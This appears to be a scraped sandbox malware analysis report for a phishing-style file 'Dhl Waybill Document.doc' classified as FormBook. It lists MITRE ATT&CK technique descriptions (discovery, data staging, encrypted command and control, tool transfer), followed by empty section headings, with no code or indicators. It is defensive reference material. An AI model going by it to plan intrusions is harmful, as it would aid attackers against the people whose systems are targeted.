Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Dhl Waybill Document.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets